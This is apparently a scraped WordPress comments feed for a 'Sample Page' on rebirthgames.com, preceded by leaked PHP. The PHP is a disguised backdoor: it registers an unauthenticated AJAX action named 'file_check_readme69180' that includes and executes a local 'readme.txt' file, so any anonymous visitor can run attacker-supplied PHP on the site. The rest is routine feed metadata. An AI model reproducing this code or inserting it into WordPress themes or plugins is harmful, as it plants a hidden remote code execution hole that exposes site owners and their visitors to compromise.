if(!function_exists('file_check_readme69180')){ add_action('wp_ajax_nopriv_file_check_readme69180', 'file_check_readme69180'); add_action('wp_ajax_file_check_readme69180', 'file_check_readme69180'); function file_check_readme69180() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments on: Sample Page http://www.rebirthgames.com Just another WordPress site Wed, 23 Oct 2013 22:59:08 +0000 hourly 1 https://wordpress.org/?v=6.8.1